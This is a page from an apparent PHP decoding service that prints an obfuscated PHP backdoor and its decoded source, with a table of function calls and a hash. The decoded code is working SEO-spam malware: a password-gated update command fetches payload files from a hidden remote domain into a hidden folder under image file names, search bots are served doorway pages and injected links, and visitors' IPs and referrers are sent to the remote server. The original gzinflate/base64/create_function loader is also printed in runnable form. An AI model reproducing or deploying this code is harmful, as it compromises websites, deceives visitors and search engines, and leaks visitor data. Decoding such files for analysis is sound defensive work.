Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $MbIAdQNEQfD="n6bf0BrMo4HzRyk5ZIPdvtelmJ7EA31QTGupiaF8XqOC2UNcKhxWjgswL9SVDY_";$vUev..
Decoded Output download
set_time_limit(0);
function change_page_regex($page, $links,$reg,$res){
$elements = array();
if (preg_match_all($reg, $page, $result)) {
$elements = $result[$res];
$elements = array_unique($elements);
}
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) {
$link = array_shift($links);
$element = array_shift($elements);
$page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
}
if (count($links)>0){
$element = "<p>";
$element .= implode("<br>
", $links);
$element .= "</p>";
$page = preg_replace('/\<\/body\>/i', "
" . $element . "
$0", $page, 1);
}
return $page;
}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
$curly_page_get_info=curl_getinfo($ch);
curl_close($ch);
return array($result,$curly_page_get_info);
}
function get_proxy_page(){
$proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://';
$crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type'];
$nexturl=@$curly_page_get_info['redirect_url'];
$status=@$curly_page_get_info['http_code'];
if (status!="")header("Status: $status");
if ($ct!=""){
header("Content-type: $ct");
}
if ($nexturl!=""){
header("Location: $nexturl");
}
return array($buf,$ct);
}
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}
$content="";
$x=@$_POST["pppp_check"];
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
$md5host=md5($host);
$urx=$host.$uri;
$md5urx=md5($urx);
$tmppath=$tmppath."/.".$md5host."/";
@mkdir($tmppath);
$configs=$tmppath."emoji1.png";
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
$domain=base64_decode("Z2V0dGhlc2VvcmRlcnMucnU=");
$p=md5(base64_decode(@$_POST["p"]));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){
echo "###UPDATING_FILES###
";
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png");
@file_put_contents($configs,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg");
@file_put_contents($bd,$buf1);
list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif");
@file_put_contents($templ,$buf1);
exit;
}
if ($x=="4"){
echo "###WORKED###
";exit;
}
}else{
$cf=array();
if (@file_exists($configs)){
$cf=@unserialize(base64_decode(@file_get_contents($configs)));
}
if (@isset($cf[$md5urx])){
$bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
$off=$cf[$md5urx]+0;
$template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf));
$keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
if ($bot) {
if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode("
",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){
$doorcontent=base64_decode($text);
echo $doorcontent;exit;
}else{
$template=str_replace("%text%",$text,$template);
$template=str_replace("%title%",$title,$template);
$template=str_replace("%description%",$description,$template);
$template=str_replace("%uckeyword%",$uckeyword,$template);
$template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){
$template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
}
echo $template;exit;
}
}else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){
$rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0;
$links=$info["links_a"];
$buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1;
$links=$info["links_p"];
$buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf;
}
}
if ($se) {
if (isset($info["isdoor"])){
list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
echo $buf1;exit;
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;exit;
}
}
}else{
list($buf,$ct)=get_proxy_page();
echo $buf;
}
}
Did this file decode correctly?
Original Code
<?php $MbIAdQNEQfD="n6bf0BrMo4HzRyk5ZIPdvtelmJ7EA31QTGupiaF8XqOC2UNcKhxWjgswL9SVDY_";$vUevVkWjoK=$MbIAdQNEQfD[2] . $MbIAdQNEQfD[37]. $MbIAdQNEQfD[54] .$MbIAdQNEQfD[22] .$MbIAdQNEQfD[1]. $MbIAdQNEQfD[9].$MbIAdQNEQfD[62].
$MbIAdQNEQfD[19].$MbIAdQNEQfD[22]. $MbIAdQNEQfD[47].$MbIAdQNEQfD[8] .$MbIAdQNEQfD[19].
$MbIAdQNEQfD[22];$zcLJQeFrIzWR=$MbIAdQNEQfD[53] .$MbIAdQNEQfD[11] .$MbIAdQNEQfD[36] . $MbIAdQNEQfD[0].
$MbIAdQNEQfD[3]. $MbIAdQNEQfD[23].
$MbIAdQNEQfD[37]. $MbIAdQNEQfD[21]. $MbIAdQNEQfD[22];$quPZNjfpjii=$MbIAdQNEQfD[22] .$MbIAdQNEQfD[6] . $MbIAdQNEQfD[6]. $MbIAdQNEQfD[8]. $MbIAdQNEQfD[6]. $MbIAdQNEQfD[62] .$MbIAdQNEQfD[6].$MbIAdQNEQfD[22].
$MbIAdQNEQfD[35]. $MbIAdQNEQfD[8].
$MbIAdQNEQfD[6] . $MbIAdQNEQfD[21] .$MbIAdQNEQfD[36].$MbIAdQNEQfD[0] .$MbIAdQNEQfD[53];$ZVaNmwoq=$MbIAdQNEQfD[47] .$MbIAdQNEQfD[6]. $MbIAdQNEQfD[22] .$MbIAdQNEQfD[37]. $MbIAdQNEQfD[21] . $MbIAdQNEQfD[22].
$MbIAdQNEQfD[62].
$MbIAdQNEQfD[3] . $MbIAdQNEQfD[34] . $MbIAdQNEQfD[0] .$MbIAdQNEQfD[47] .$MbIAdQNEQfD[21] .$MbIAdQNEQfD[36]. $MbIAdQNEQfD[8] .$MbIAdQNEQfD[0];$quPZNjfpjii(0);$YvjEvSPjIhdxz=$ZVaNmwoq("",$zcLJQeFrIzWR($vUevVkWjoK("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")));$YvjEvSPjIhdxz();?>Function Calls
| null | 1 |
| gzinflate | 1 |
| base64_decode | 1 |
| create_function | 1 |
| error_reporting | 1 |
Stats
| MD5 | b38bd6d3bf7759663be140c01b18502c |
| Eval Count | 1 |
| Decode Time | 104 ms |